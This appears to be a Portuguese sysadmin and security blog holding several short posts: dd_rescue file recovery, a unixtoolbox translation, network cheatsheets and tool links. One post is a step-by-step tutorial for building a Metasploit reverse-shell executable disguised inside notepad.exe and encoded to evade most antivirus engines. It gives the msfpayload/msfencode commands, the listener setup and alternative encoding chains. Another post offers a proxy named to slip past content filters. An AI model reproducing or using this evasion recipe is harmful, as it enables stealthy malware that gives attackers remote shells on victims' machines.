Olá !!!
Depois de muito tempo sem postar, adicionei ao site um “repositório” do PHProxy : http://www.layer8howto.net/poxy/
O nome poxy foi proposital para bypass os filtros de conteúdo ja na URL.
Outro link que deixo é dos materiais da BlackHat edição “Europe” 2010 : http://blackhat.com/html/bh-eu-10/bh-eu-10-archives.html
Aquele Abraço a todos!!
[]‘s Sergito
Após umas semanas, o projeto de tradução do unixtoolbox para o português já esta no meio do caminho, com 50% do texto traduzido e postado no site oficial, vejam o link abaixo:
http://cb.vu/unixtoolbox_pt.xhtml
[]‘s Sergito
Olaa gente!! Todos nós ja passamos por situações que pegam a gente desprevinido, ainda mais quando o assunto é o backup. Já passei por uma situação onde o disco do servidor onde trabalho começou a aparentar uns erros de badblock, medida a tomar, migrar a base de dados para outro disco e ótimo, mas quem diz que a base copiava?? CRC error, IO error para tudo quanto era lado.
Surge a ideia de restaurar o backup, mas devido aos badblocks ele também estava sendo danificado, uma alternativa para ajudar pode ser o dd_rescue. Além dele poder fazer uma imagem de um disco corrompido (salvando o que é possível) ele também pode te ajudar na cópia de arquivos gigantes tentando recuperar o máximo possível (Ex: máquinas virtuais), pois espaços que ele não conseguir ler, ele pula o inode e continua o processo, quando chegar no final do disco ele volta nos setores defeituosos e tenta copiar novamente sendo assim você terá uma margem de erro bem pequena.
Com a praticidade de ser instalado via aptitude, ele pode ser utilizado em conjunto com o dd_rhelp em casos mais graves, e o mydefrag para ajudar a organizar as inodes selecionando ainda mais os bad dos blocos bons. Em exemplo seria:
# dd_rescue -A -v /home/backup/bkp_banco.bz2 /mnt/disco/bkp_banco_rescue_.bz2
e claro… torcer muito, vela, terço, oração etc…!!! 
Links:
http://www.garloff.de/kurt/linux/ddrescue/
http://www.kalysto.org/utilities/dd_rhelp/index.fr.html
[]‘s Sergito
A partir de hoje eu e meu amigo Caio começaremos a tradução para o português do projeto unix toolbox, para quem não conhece é um documento que contém um coleção de comandos para os sysadmins *unix like. Segue o site do projeto: http://cb.vu/unixtoolbox.xhtml
Em breve atualizações…
[]‘s
Da série de cheatsheet que foram publicadas aqui a algum tempo, surge mais algumas na net e compartilho com vc’s, muito úteis para levar no pendrive, bolso, meia, carteira etc…
Download VLAN: VLANs.pdf
Download QoS: QoS.pdf
Download STP: Spanning_Tree.pdf
Download Misc Tools: misc_tools_sheet_v1.pdf
Download OSPF: OSPF.pdf
Download EIGRP: EIGRP.pdf
Download Protocolos de Redundância: First_Hop_Redundancy.pdf
Download Instrusion Discovery: Intrusion Discovery.pdf
[]‘s Sergito
Depois de uns dias sem postar, volto aqui novamente com um post interessante!! Um tutorial bem completo saiu no site do securityninja sobre burp suite. Para quem não conhece, o burp suite é uma ferramenta para automatizar ataques em aplicações web, onde pode ser baixado aqui: http://portswigger.net/suite/download.html
Tutorial: http://www.securityninja.co.uk/burp-suite-tutorial-the-intruder-tool
[]‘s Sergito
Peço desculpa aos poucos leitores deste blog, pelos posts tão diretos, é que o tempo ta curto msm!!
Depois de algumas pesquisas na net, consegui criar um executável com o msfencode no qual faz um “reverse shell” sendo detectável apenas por 3 AV’s. Um vídeo do pauldotcom demonstra como fazer, porém a grande sacada não é explicada no vídeo, quando é injetado strings do notepad.exe dentro do “malware”, então.. mãos a obra!!
Primeiramente vc precisará do metasploit instalado e de preferência atualizado, eu utilizei o BT4 e um windows xp para a execução do malware.
1) Vamos copiar o notepad.exe de alguma máquina windows para o diretório de templates do msfencode, porque será essencial para a criação do malware.
Como visto acima, o notepad.exe deverá ficar no /opt/metasploit3/msf3/data/templates
2) Agora injetaremos o payload no executável, para isso voltaremos ao diretório /opt/metasploit3/msf3 e executaremos:
msfpayload windows/shell/reverse_tcp LHOST=192.168.48.142 LPORT=4444 R | ./msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -o malware1.exe
No qual o ip 192.168.48.142(bt4) é onde o alvo do nosso malware irá tentar conectar na porta 4444.
3) Arquivo criado, agora vamos verificar com o vitus total para tirar a prova!
Maravilha!! Avg, Symantec e Microsoft, estes foram os 3 AV’s que detectaram o nosso malware:
http://www.virustotal.com/pt/analisis/50d138c0dd8ac5bd75590d8a688473558d07cb1468fe7091b5b5e2a57d0a5339
4) Agora iremos executar e verificar se tudo esta ocorrendo bem!
Primeiramente, no seu bt4 (192.168.48.142), na pasta /opt/metasploit3/msf3/, execute:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.48.142 LPORT=4444 E
5) Agora nosso bt4 já esta pronto para receber a conexão do nosso alvo, para isso só falta executar o malware….
e…. enquanto isso no bt4…
Pronto!! Feito!!
Dentre outras maneiras de injetar o payload, essa foi a mais eficaz contra os AV’s, alguns exemplos abaixo no qual tentei:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.48.142 LPORT=4444 R | ./msfencode -b ‘ ‘ | ./msfencode -x notepad.exe -t exe -e x86/shikata_ga_nai -o malware2.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.142 LPORT=4444 R | ./msfencode -e x86/fnstenv_mov -b ‘\x00\xff’ -t raw | ./msfencode -b ‘ ‘ -t exe -o malware3.exe
[]‘s Sergito
Referências:
http://pauldotcom.com/2010/02/bypassing-av-with-msfencode–x.html
Esta precisando construir uma expressão regular? sem utilizar muito do seu tempo? Uma ferramenta simples para KDE no formato de widget te auxilia muito quando vc mais precisa!! A KRegExpEditor pode ser instalável via aptitude e é uma alternativa aos diversos programas que vc encontra por ae.
[]‘s Sergito
